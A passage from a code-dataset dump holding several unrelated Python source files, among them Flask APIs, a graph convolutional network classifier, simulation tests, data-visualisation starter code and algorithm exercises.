connectorLog():\n\n logger = logging.getLogger() # 不加名称设置root logger\n logger.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s: - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'\n )\n # 使用FileHandler输出到文件\n fh = logging.FileHandler('prm_core/iManageConnector/iManageConnector.log')\n fh.setLevel(logging.INFO)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n return logger\n","sub_path":"prm_core/iManageConnector/connectorLog.py","file_name":"connectorLog.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"390466429","text":"# Copyright 2013 DEVSIM LLC\n#\n# SPDX-License-Identifier: Apache-2.0\n\n# The purpose is to verify our triangle element field calculation.\n# It is based on Laux's weighting scheme\n#@article{Laux:1985,\n# author = {Laux, Steven E. and Byrnes, Robert G.},\n# title = {Semiconductor device simulation using generalized mobility models},\n# journal = {IBM J. Res. Dev.},\n# issue_date = {May 1985},\n# volume = {29},\n# number = {3},\n# month = may,\n# year = {1985},\n# issn = {0018-8646},\n# pages = {289--301},\n# numpages = {13},\n# url = {http://dx.doi.org/10.1147/rd.293.0289},\n# doi = {10.1147/rd.293.0289},\n# acmid = {1012099},\n# publisher = {IBM Corp.},\n# address = {Riverton, NJ, USA},\n#}\n\nimport sys\ntry:\n import numpy\n import numpy.linalg\nexcept:\n print(\"numpy is not available with your installation and is not being run\")\n sys.exit(-1)\n\n\nfrom devsim import *\nfrom laux_common import *\nimport laux_common\n\n\nload_devices(file=\"gmsh_diode3d_dd.msh\")\ndevice = \"diode3d\"\nregion = \"Bulk\"\n\nSetDimension(3)\nnee = laux_common.nee\nnen = laux_common.nen\ndim = laux_common.dim\n\n\n\n# There are nee edges per tetrahedron\n#number_elements = len(scalar_efield)/laux_common.nee;\n\n\nnumber_test = -1\n\nRunTest(device, region, number_test, \"ElectricField\", \"Potential\")\n\nimport devsim\ndevsim.set_parameter(name=\"V_t\", value=0.0259)\ndevsim.set_parameter(name=\"mu_n\", value=400)\ndevsim.set_parameter(name=\"ElectronCharge\", value=1.6e-19)\nRunTest(device, region, number_test, \"ElectronCurrent\", \"Potential\")\n\n\n","sub_path":"examples/diode/laux3d.py","file_name":"laux3d.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"464669730","text":"'''\nIn this project, you will visualize the feelings and language used in a set of\nTweets. This starter code loads the appropriate libraries and the Twitter data you'll\nneed!\n'''\n\nimport json\nfrom textblob import TextBlob\nimport matplotlib.pyplot as plt\n\n#Get the JSON data\ntweetFile = open(\"TwitterData/tweets_small.json\", \"r\")\ntweetData = json.load(tweetFile)\ntweetFile.close()\n\n# Continue your program below! \ntweet_text = []\ntweetstring = \"\"\nfor tweet in tweetData:\n tweetstring += tweet['text']\n x = tweet['text']\n tweet_text.append(x)\n# print(tweetstring)\n\n# Textblob sample:\npolarity = []\nsubjectivity = []\n\n# print(tweet_text)\nfor tweet in tweet_text:\n tb = TextBlob(tweet)\n subjectivity.append(tb.subjectivity)\n polarity.append(tb.polarity)\ntweetBlob = TextBlob(tweetstring)\nword_dict = {}\nfor word in tweetBlob.words:\n word_dict[word.lower()] = tweetBlob.word_counts[word.lower()]\n print(word_dict)\n\n\n\n# print(subjectivity)\n# print(polarity)\n\n# y = sum(polarity)/len(polarity)\n# w = sum(subjectivity)/len(subjectivity)\n# print(y)\n# print(w)\n\n# import matplotlib.pyplot as plt\n\n# plt.hist(polarity, bins=[-1, -0.5, 0.0, 0.5, 1])\n# plt.hist(subjectivity, bins=[-1, -0.5, 0.0, 0.5, 1])\n# plt.xlabel('Values')\n# plt.ylabel('Number of Items')\n# plt.title('Histogram of Numbers')\n# plt.axis([-1.1, 1.1, 0, 100])\n# plt.grid(True)\n# plt.show()","sub_path":"U2-Applications/U2.1-Data/data_vis_project_starter.py","file_name":"data_vis_project_starter.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"532396899","text":"import collections\nimport sys\ninput = sys.stdin.readline\nimport heapq\nfrom array import array\ndef solve():\n n = int(input())\n\n query2 = collections.deque([])\n edge = [[] for _ in range(n)]\n ans = array('I', [ 0 for i in range(n)])\n for i in range(n-1):\n a,b = (int(i) for i in input().split())\n query2.append(a)\n query2.append(b)\n edge[a-1].append(b-1)\n edge[b-1].append(a-1)\n c = list(int(i) for i in input().split())\n if n == 1:\n print(1)\n print(c[0])\n exit()\n c = collections.deque(sorted(c,reverse =True))\n d = collections.Counter(query2)\n d2 = d.most_common()\n bfs = []\n heapq.heappush(bfs,(-1*d2[0][1],d2[0][0]-1,-1))#回数,場所、親\n ct = 0\n visit = [False]*n\n while bfs:\n times,place,parent = heapq.heappop(bfs)\n if visit[place]:\n continue\n else:\n visit[place] = True\n\n for i in range(len(edge[place])):\n newp = edge[place][i]\n newtimes = len(edge[newp])\n if not visit[newp]:\n heapq.heappush(bfs,(-1*newtimes,newp,place))\n #print(place,parent,times)\n ans[place] = c.popleft()\n\n #print(c,place)\n\n print(sum(ans)-max(ans))\n print(*ans)\n \nsolve()\n","sub_path":"Python_codes/p03026/s087459191.py","file_name":"s087459191.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"285738070","text":"from rest_framework import serializers\n\nfrom deeplobe_api.db.models import Task\n\nclass TaskSerializer(serializers.ModelSerializer):\n class Meta:\n model = Task\n fields = [\n \"id\",\n \"uuid\",\n \"weight_name\",\n \"task_type\",\n \"user\",\n \"task_finished\",\n \"data\",\n \"extra\"\n ]\n\n","sub_path":"deeplobe_api/api/serializers/task_serializer.py","file_name":"task_serializer.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"509382565","text":"from flask import request\nfrom flask_restful import Resource, reqparse, abort\n\nfrom flaskr import db\nfrom flaskr.models import Song\nfrom flaskr.utils import with_pagination\n\n\ndef init_resources(api):\n api.add_resource(SongListResource, '/songs')\n api.add_resource(SongListSearchResource, '/songs/search')\n api.add_resource(SongPollResource, '/songs/rating')\n api.add_resource(SongDifficultyStatResource, '/songs/avg/difficulty')\n api.add_resource(SongRatingStatResource, '/songs/avg/rating/')\n\n\nclass SongListResource(Resource):\n @with_pagination\n def get(self, page=None, page_size=None):\n query = Song.query\n\n if page is not None:\n query = query.paginate(page, page_size).items\n\n return [song.to_json() for song in query]\n\n\nclass SongListSearchResource(Resource):\n @with_pagination\n def get(self, page=None, page_size=None):\n parser = reqparse.RequestParser()\n parser.add_argument('message', type=str, required=True)\n message = parser.parse_args()['message']\n\n query = Song.query.filter({'$text': {'$search': message}})\n\n if page is not None:\n query = query.paginate(page, page_size).items\n\n return [song.to_json() for song in query]\n\n\nclass SongPollResource(Resource):\n def post(self):\n song_id = request.form.get('song_id')\n rating_str = request.form.get('rating')\n\n if not rating_str or not rating_str.isdigit():\n abort(400)\n rating = int(rating_str)\n\n if not (1 <= rating <= 5):\n abort(400)\n\n song = Song.query.get_or_404(song_id)\n song.ratings.append(rating)\n song.save()\n return song.to_json()\n\n\nclass SongDifficultyStatResource(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('level', type=int)\n level = parser.parse_args().get('level')\n\n pipeline = []\n if level is not None:\n pipeline.append({'$match': {'level': level}})\n\n pipeline.append({\n '$group': {\n '_id': None,\n 'result': {'$avg': '$difficulty'}\n }\n })\n cursor = db.session.db.Song.aggregate(pipeline=pipeline, cursor={})\n\n for doc in cursor:\n return {'average_difficulty': doc['result']}\n else:\n return {'average_difficulty': None}\n\n\nclass SongRatingStatResource(Resource):\n def get(self, song_id):\n ratings = Song.query.get_or_404(song_id).ratings\n\n if not ratings:\n return {\n 'average': None,\n 'lowest': None,\n 'highest': None,\n }\n\n return {\n 'average': sum(ratings) / len(ratings),\n 'lowest': min(ratings),\n 'highest': max(ratings),\n }\n","sub_path":"flaskr/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"447863309","text":"import math\nimport time\nimport numpy as np\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules.module import Module\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport torch\nimport torch.optim as optim\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport os\n\nimport pickle\nimport scipy.sparse as sp\nfrom sklearn.model_selection import cross_val_score, GridSearchCV, StratifiedKFold\nfrom skorch import NeuralNetClassifier\nfrom sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score\n\n\nX = pickle.load(open(\"X_tfidf_matrix.pkl\", \"rb\"))\ny_onehot = pickle.load(open(\"y_onehot.pkl\", \"rb\"))\ny = np.argmax(y_onehot, axis=1)\n\nX[:,:100]=pickle.load(open(\"../data/Bow.pkl\", \"rb\"))\n\n\ndef normalize(mx):\n \"\"\"Row-normalize sparse matrix\"\"\"\n rowsum = np.array(mx.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n mx = r_mat_inv.dot(mx)\n return mx\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\n indices = torch.from_numpy(\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\n values = torch.from_numpy(sparse_mx.data)\n shape = torch.Size(sparse_mx.shape)\n return torch.sparse.FloatTensor(indices, values, shape)\n\n\nadj = pickle.load(open(\"Adj_sparse.pkl\", \"rb\"))\n# build symmetric adjacency matrix\nadj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n# mytrick: add epsilon, \n#epsilon = 1\nadj = normalize(adj + sp.eye(adj.shape[0]))\n\n# 2 order develop of g * x\n#adj = normalize(adj c+ 0.001*sp.eye(adj.shape[0]))\n#adj = adj + 2*adj.dot(adj)\nadj = sparse_mx_to_torch_sparse_tensor(adj)\n\n\nX = normalize(X)\n\n\nclass GraphConvolution(Module):\n def __init__(self, in_features, out_features, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.FloatTensor(in_features, out_features))\n if bias:\n self.bias = Parameter(torch.FloatTensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n if self.bias is not None:\n self.bias.data.uniform_(-stdv, stdv)\n\n def forward(self, input, adj):\n\n support = torch.mm(input, self.weight)\n\n output = torch.spmm(adj, support)\n if self.bias is not None:\n return output + self.bias\n else:\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'\n\n\n\nclass GCN(nn.Module):\n def __init__(self, nfeat, nclass, adj, allfeatures, dropout = 0.0):\n super(GCN, self).__init__()\n self.adj = adj\n self.allfeatures = allfeatures\n self.gc1 = GraphConvolution(nfeat, int(nfeat/2))\n \n self.gc2 = GraphConvolution(int(nfeat/2), nclass)\n self.dropout = dropout\n\n def forward(self, idx):\n x = F.relu(self.gc1(self.allfeatures, self.adj))\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc2(x, self.adj)\n \n return x[idx.long()]\n\n\nnet = NeuralNetClassifier(GCN,\n module__nfeat=X.shape[1],\n module__nclass=y.max()+1,\n module__adj=adj,\n module__allfeatures=torch.FloatTensor(X),\n criterion=nn.CrossEntropyLoss,\n iterator_train__shuffle=True,\n batch_size=-1\n )\n\n\n\nparams = {\n 'lr': [0.1,0.05,0.01, 0.005,0.001],\n 'max_epochs': [ 20, 25, 30,40,50,60],\n 'optimizer': [optim.Adam, optim.AdamW, optim.RMSprop]\n}\n\nK = 10\nskfold = StratifiedKFold(n_splits=K, shuffle=True, random_state=1234)\n\n\nprint(\"Parameter search:\")\ngs = GridSearchCV(net, params, cv=skfold, scoring=['f1_micro', 'f1_macro', \"accuracy\"], refit=\"f1_macro\")\ngs.fit(np.arange(0,len(X)), y)\n\nprint(\"Best parameters:\")\ngs.best_params_\n\nnet = NeuralNetClassifier(GCN,\n module__nfeat=X.shape[1],\n module__nclass=y.max()+1,\n module__adj=adj,\n module__allfeatures=torch.FloatTensor(X),\n lr=gs.best_params_['lr'],\n max_epochs=gs.best_params_['max_epochs']+20,\n optimizer = gs.best_params_['optimizer'],\n criterion=nn.CrossEntropyLoss,\n iterator_train__shuffle=True,\n batch_size=-1\n )\n\n\nf1macro = np.mean(cross_val_score(net, np.arange(len(X)), y, scoring='f1_macro', cv=skfold))\nnet.initialize()\nf1micro = np.mean(cross_val_score(net, np.arange(len(X)), y, scoring='f1_micro', cv=skfold))\nnet.initialize()\naccuracy = np.mean(cross_val_score(net, np.arange(len(X)), y, scoring='accuracy', cv=skfold))\n\nprint(\"Results with best parameters\")\nprint(\"F1 macro:{}\\nF1_micro:{}\\nAccuracy:{}\".format(f1macro, f1micro, accuracy))\n\n\n\nprint(\"OneVSRest Results with best parameters\")\nnet = NeuralNetClassifier(GCN,\n module__nfeat=X.shape[1],\n module__nclass=2,\n module__adj=adj,\n module__allfeatures=torch.FloatTensor(X),\n lr=gs.best_params_['lr'],\n max_epochs=gs.best_params_['max_epochs'],\n optimizer = gs.best_params_['optimizer'],\n criterion=nn.CrossEntropyLoss,\n iterator_train__shuffle=True,\n batch_size=-1\n )\n\n\nratio_matrix = np.zeros((y_onehot.shape[1], K, 2))\nf1_matrix = np.zeros((y_onehot.shape[1], K))\nprecision_matrix = np.zeros((y_onehot.shape[1], K))\nrecall_matrix = np.zeros((y_onehot.shape[1], K))\naccuracy_matrix = np.zeros((y_onehot.shape[1], K))\n\nfor k, idx in enumerate(skfold.split(X, y.reshape(-1))):\n idx_val, idx_train = idx\n for i in range(y.max()+1):\n y_prime = np.zeros(y.shape[0])\n y_prime[y==i] = 1\n y_prime = y_prime.astype(np.longlong)\n y_train, y_val = y_prime[idx_train], y_prime[idx_val]\n print(\"*** class {} fold {}\".format(i, k))\n ratio_matrix[i][k][0] = sum(y_train)/len(y_train)\n ratio_matrix[i][k][1] = sum(y_val)/len(y_val)\n net.initialize()\n y_pred = net.fit(idx_train,y_train).predict(idx_val)\n f1_matrix[i][k] = f1_score(y_val, y_pred)\n precision_matrix[i][k] = precision_score(y_val, y_pred)\n recall_matrix[i][k] = precision_score(y_val, y_pred)\n accuracy_matrix[i][k] = accuracy_score(y_val, y_pred)\n\n\n\nfor i in range(y.max()+1):\n for k in range(K):\n print(\"Class {} Fold {}: train ratio:{:.2f}% val ratio:{:.2f}%.\".format(i,k+1,ratio_matrix[i][k][0]*100,ratio_matrix[i][k][1]*100))\n\nprint(\"Result matrix:\\n i-th row and j-th column represents the corresponding result of i-th class and j-th split.\")\nprint(\"F1 score:\")\nprint(f1_matrix)\nprint(\"Precision score:\")\nprint(precision_matrix)\nprint(\"Recall score\")\nprint(recall_matrix)\nprint(\"Accuracy score:\")\nprint(accuracy_matrix)\n\n","sub_path":"GCN/Classfication_GCN_bow.py","file_name":"Classfication_GCN_bow.py","file_ext":"py","file_size_in_byte":7574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"437976913","text":"from pyadlml.dataset.representations.raw import create_raw\nfrom pyadlml.dataset.representations.changepoint import create_changepoint\nfrom pyadlml.dataset.devices import check_devices\nfrom pyadlml.dataset.activities import check_activities\n\nclass Data():\n def __init__(self, activities, devices):\n assert check_activities(activities) \n assert check_devices(devices)\n\n self.df_activities = activities\n self.df_devices = devices\n\n # list of activities and devices\n self.activities = list(activities.activity.unique())\n self.devices = list(devices.device.unique())\n self.df_raw = None\n self.df_cp = None\n self.df_lf = None\n\n def create_cp(self, t_res):\n raise NotImplementedError\n\n def create_raw(self, t_res=None, idle=False):\n self.df_raw = create_raw(self.df_devices, self.df_activities, t_res)\n\n def create_lastfired(self):\n raise NotImplementedError","sub_path":"pyadlml/dataset/obj.py","file_name":"obj.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"460049573","text":"from rasa.core.agent import Agent\nfrom rasa.core.interpreter import RasaNLUInterpreter\nimport asyncio\n\nagent = Agent.load(\"/Users/lidayuan/Documents/edison/nlu/rasa/examples/rasasc/models/20190916-144136\")\n\n\nasync def get_answer():\n data = await agent.handle_text(\"What is Edison Privacy Policy for the Email app?\")\n print(data)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(get_answer())\n loop.close()\n","sub_path":"examples/rasasc/model_test_by_agent.py","file_name":"model_test_by_agent.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"158341340","text":"import turtle\r\nturtle.width(1)\r\nturtle.bgcolor(\"black\")\r\ncolors=[\"red\",\"yellow\",\"blue\",\"green\",\"orange\",\"purple\"]\r\nturtle.tracer(False)\r\nfor x in range(182):\r\n turtle.forward(2*x)\r\n turtle.color(colors[x%6])\r\n turtle.left(-299)\r\n turtle.width(x*6/210)\r\nturtle.tracer(Ture)\r\nturtle.done()\r\n","sub_path":"旋转图案.py","file_name":"旋转图案.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"580598240","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 11 15:36:20 2018\n\n@author: wcd\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport warnings \nwarnings.filterwarnings('ignore')\n\nfrom bokeh.plotting import figure,show,output_file\nfrom bokeh.models import ColumnDataSource\n\nprint('finished')\n\nimport os\nos.chdir('C:\\\\Users\\\\wcd\\\\Desktop\\\\')\n\ndef1=pd.read_excel('上海餐饮数据.xlsx',sheetname=0)\n\n#计算\n\ndata1=def1[['类别','口味','环境','服务','人均消费']]\n\ndata1.dropna(inplace=True)\ndata1=data1 [(data1['口味']>0)& (data1['人均消费']>0)]\ndata1['性价比']=(data1['口味']+data1['环境']+data1['服务'])/data1['人均消费']\n#qingxishuju\n\ndef f1():\n # fig,axes=plt.subplots(1,3,figsize(10,4))\n fig,axes = plt.subplots(1,3,figsize = (10,4))\n data1.boxplot(column=['口味'],ax=axes[0])\n data1.boxplot(column=['人均消费'],ax=axes[1])\n data1.boxplot(column=['性价比'],ax=axes[2])\n \n \n \n \ndef f2(data,col):\n q1=data[col].quantile(q=0.25)\n q3=data[col].quantile(q=0.75)\n iqr=q3-q1\n t1=q1-3*iqr\n t2=q3+3*iqr\n return data[(data[col]>t1)&(data[col] \".format(camino[i]), end = \"\")\r\n\tprint(camino[-1])\r\n\r\n\r\nINFINITO = 9999999 #simulamos un numero gigante\r\n\r\ndef cmp(a,b):\r\n return (a>b) - (atupla2[1]) - (tupla1[1] 0\n\ndef softmax(Z):\n A = np.exp(Z) / sum(np.exp(Z))\n return A\n\ndef predict(X,index, Theta1, bias1, Theta2, bias2):\n image = X[:, index, None]\n\n _, _, _, A2 = nn.forward_prop(Theta1, bias1, Theta2, bias2, X)\n predictions = np.argmax(A2,0)\n\n print(\"Prediction: \", predictions[index])\n image = image.reshape((28, 28)) * 255\n plt.gray()\n plt.imshow(image, interpolation='nearest')\n plt.show()","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"330030923","text":"from flask import g, request, jsonify, current_app, session\nfrom info import db, constants\nfrom info.constants import QINIU_DOMIN_PREFIX\nfrom info.models import Category, News\nfrom info.utils.pic_storage import pic_storage\nfrom info.utils.response_code import RET\nfrom . import profile_bp\nfrom flask import render_template\nfrom info.utils.common import user_login_data\n\n\n@profile_bp.route('/user_follow')\n@user_login_data\ndef user_follow():\n # 获取页数\n p = request.args.get(\"p\", 1)\n try:\n p = int(p)\n except Exception as e:\n current_app.logger.error(e)\n p = 1\n\n user = g.user\n\n follows = []\n current_page = 1\n total_page = 1\n try:\n # user.followed当前登录用户的关注列表\n paginate = user.followed.paginate(p, constants.USER_FOLLOWED_MAX_COUNT, False)\n # 获取当前页数据\n follows = paginate.items\n # 获取当前页\n current_page = paginate.page\n # 获取总页数\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n\n user_dict_li = []\n\n for follow_user in follows:\n user_dict_li.append(follow_user.to_dict())\n data = {\"users\": user_dict_li, \"total_page\": total_page, \"current_page\": current_page}\n return render_template('profile/user_follow.html', data=data)\n\n\n@profile_bp.route('/news_release', methods=['GET', 'POST'])\n@user_login_data\ndef news_release():\n \"\"\"用户发表新闻的接口\"\"\"\n if request.method == \"GET\":\n # 查询所有分类数据\n try:\n categories = Category.query.all()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.DBERR, \"errmsg\": '新闻类别查询错误'})\n\n # 对象列表转字典列表\n category_dict = []\n for category in categories:\n category_dict.append(category.to_dict())\n\n # 移处 最新 分类\n category_dict.pop(0)\n\n # 组织响应数据\n data = {\n \"categories\":category_dict\n }\n return render_template(\"profile/user_news_release.html\",data = data)\n\n \"\"\"\n 如果是post请求:发布新闻\n 1.获取参数\n 1.1 title:新闻标题 category_id:新闻分类ID source:新闻来源(默认个人发布)\n digest:新闻摘要 index_image:索引图片 content:新闻\n 2.1 当前用户\n 2.检验参数\n 2.1 非空判断\n 3.逻辑处理\n 3.1 将新闻主图上传到七牛云\n 3.2 创建新闻对象,并赋值属性\n 3.3 保存到数据库\n 4.返回值\n \"\"\"\n\n # 1.1 获取参数\n param_dict = request.form\n\n title = param_dict.get(\"title\")\n category_id = param_dict.get(\"category_id\")\n digest = param_dict.get(\"digest\")\n content = param_dict.get(\"content\")\n source = \"个人发布\"\n\n index_image = request.files.get(\"index_image\")\n\n # 1.2 获取当前用户\n user = g.user\n\n # 2.1 非空判断\n if not all([title,category_id,digest,content,index_image]):\n return jsonify({\"errno\":RET.PARAMERR, \"errmsg\": '参数不足'})\n\n # 判断用户是否登录\n if not user:\n return jsonify(errno=RET.SESSIONERR, errmsg=\"用户未登录\")\n\n\n try:\n pic_data = index_image.read()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.DBERR, \"errmsg\": '图片获取失败'})\n\n # 3.1 将新闻主图上传到七牛云\n try:\n key = pic_storage(pic_data)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.DBERR, \"errmsg\": '上传图片到七牛云失败'})\n\n # 3.2 创建新闻对象,并赋值属性\n news = News()\n news.title = title\n news.category_id = category_id\n news.digest = digest\n news.content = content\n news.index_image_url = constants.QINIU_DOMIN_PREFIX +key\n news.source = source\n news.user_id = user.id\n # 默认:审核中\n news.status = 1\n\n # 3.3 保存到数据库\n # 3. 将评论模型对象保存到数据库\n try:\n db.session.add(news)\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR, errmsg=\"保存新闻对象异常\")\n\n return jsonify(errno=RET.OK, errmsg='发布成功')\n\n\n@profile_bp.route('/pass_info', methods=['GET', 'POST'])\n@user_login_data\ndef pass_info():\n \"\"\"修改密码接口\"\"\"\n if request.method == 'GET':\n return render_template(\"profile/user_pass_info.html\")\n\n \"\"\"\n 如果是post请求,则是 修改密码\n 1.获取参数\n 1.1 old_password:旧密码 new_password:新密码 用户对象\n 2.检验参数\n 2.1 非空判断\n 3.逻辑处理\n 3.1 如果old_password不正确 终止修改\n 3.2 如果old_password正确 则修改并保存\n 4.返回值\n \"\"\"\n # 1.1 old_password:旧密码 new_password:新密码 用户对象\n # 1.1 获取参数\n param_dict = request.json\n\n old_password = param_dict.get(\"old_password\")\n new_password = param_dict.get(\"new_password\")\n\n # 1.2 获取当前用户\n user = g.user\n\n # 2.1 非空判断\n if not all([new_password,old_password]):\n return jsonify({\"errno\":RET.PARAMERR, \"errmsg\": '参数不足'})\n\n # 判断用户是否登录\n if not user:\n return jsonify(errno=RET.SESSIONERR, errmsg=\"用户未登录\")\n\n # 3.1 如果old_password不正确 终止修改\n # if old_password != user.password: -------------> 因为保存的是hash值,所以不能这么比较\n if not user.check_passowrd(old_password):\n return jsonify(errno=RET.PWDERR, errmsg='密码错误')\n\n # 如果old_password正确 则修改并保存\n user.password = new_password\n\n # 3. 将评论模型对象保存到数据库\n try:\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"保存评论对象异常\")\n\n return jsonify(errno=RET.OK, errmsg='密码修改成功')\n\n\n@profile_bp.route('/pic_info', methods=['GET', 'POST'])\n@user_login_data\ndef pic_info():\n \"\"\"展示用户头像页面 修改用户图片接口\"\"\"\n user = g.user\n if request.method == \"GET\":\n data={\n \"user_info\":user.to_dict()\n }\n return render_template(\"profile/user_pic_info.html\",data = data)\n\n \"\"\"\n 如果是post请求,则是修改头像\n 1.获取参数\n 1.1 avatar 头像\n 2.检验参数\n 3.逻辑处理\n 3.1 上传至七牛云\n 3.2 保存头像链接\n 4.返回值\n \"\"\"\n # 1.1 avatar 头像\n try:\n avatar_file = request.files.get(\"avatar\").read()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.PARAMERR, \"errmsg\": '获取上传的头像出现异常'})\n\n # 3.1 上传至七牛云\n try:\n key = pic_storage(avatar_file)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.THIRDERR, \"errmsg\": '上传图片出现错误'})\n\n # 3.2 保存头像链接---不保存域名到数据库,方便以后更改域名,而不需要修改数据库\n user.avatar_url = key\n\n # 3. 将评论模型对象保存到数据库\n try:\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"保存头像对象异常\")\n\n return jsonify(errno=RET.OK, errmsg='图像上传成功',data={\"avatar_url\":constants.QINIU_DOMIN_PREFIX+key})\n\n\n#127.0.0.1:5000/user/base_info\n@profile_bp.route('/base_info',methods = [\"post\",\"get\"])\n@user_login_data\ndef user_base_info():\n \"\"\"展示用户基本资料页面\"\"\"\n # 获取用户对象\n user = g.user\n\n if request.method == \"GET\":\n # 组织返回数据\n data = {\n \"user_info\": user.to_dict() if user else None\n }\n\n return render_template(\"profile/user_base_info.html\",data=data)\n\n\n \"\"\"\n 如果是POST请求,即为修改资料\n 1.获取参数\n 1.1 nick_name 昵称 signature 签名 gender 性别\n 2.检验参数\n 2.1 非空判断\n 3.逻辑处理\n 3.1 修改数据库中user的信息,并保存\n 3.2 修改session的nick_name\n 4.返回值\n \"\"\"\n # 1.1 获取参数\n param_dict = request.json\n\n nick_name = param_dict.get(\"nick_name\")\n signature = param_dict.get(\"signature\")\n gender = param_dict.get(\"gender\")\n\n # 1.2 获取当前用户\n user = g.user\n\n # 2.1 非空判断\n if not all([gender,signature,nick_name]):\n return jsonify({\"errno\":RET.PARAMERR, \"errmsg\": '参数不足'})\n\n # 判断用户是否登录\n if not user:\n return jsonify(errno=RET.SESSIONERR, errmsg=\"用户未登录\")\n\n # 3.1 修改数据库中user的信息, 并保存\n user.nick_name = nick_name\n user.signature = signature\n user.gender= gender\n\n # 3.1 将评论模型对象保存到数据库\n try:\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"保存评论对象异常\")\n\n # 3.2 修改session的nick_name\n session[\"nick_name\"] = nick_name\n\n # 4.返回值\n return jsonify(errno=RET.OK, errmsg='资料修改成功')\n\n\n#127.0.0.1:5000/user/info\n@profile_bp.route('/info')\n@user_login_data\ndef get_user_info():\n \"\"\"展示用户个人中心数据\"\"\"\n # 获取用户对象\n user = g.user\n # 组织返回数据\n data = {\n \"user_info\": user.to_dict() if user else None\n }\n return render_template(\"profile/user.html\", data=data)\n\n\n@profile_bp.route('/collection', methods=['GET', 'POST'])\n@user_login_data\ndef user_collection():\n \"\"\"展示用户收藏的列表接口\"\"\"\n # 获取页数\n p = request.args.get(\"p\",1)\n\n try:\n p = int(p)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.PARAMERR, \"errmsg\": '传入页面的参数错误'})\n\n user = g.user\n\n # 进行分页查询\n try:\n paginate = user.collection_news.paginate(p,constants.USER_COLLECTION_MAX_NEWS,False)\n # 获取分页数据\n collections = paginate.items\n # 获取当前页\n current_page = paginate.page\n # 获取总页数\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.DBERR, \"errmsg\": '数据库新闻收藏查询错误'})\n\n # 收藏列表\n collection_dict_list = []\n for news in collections:\n collection_dict_list.append(news.to_basic_dict())\n\n data = {\n \"total_page\": total_page,\n \"current_page\": current_page,\n \"collections\": collection_dict_list\n }\n\n return render_template(\"profile/user_collection.html\",data = data)\n\n\n@profile_bp.route('/news_list')\n@user_login_data\ndef news_list():\n # 获取页数\n p = request.args.get(\"p\", 1)\n try:\n p = int(p)\n except Exception as e:\n current_app.logger.error(e)\n p = 1\n\n user = g.user\n news_li = []\n current_page = 1\n total_page = 1\n try:\n paginate = News.query.filter(News.user_id == 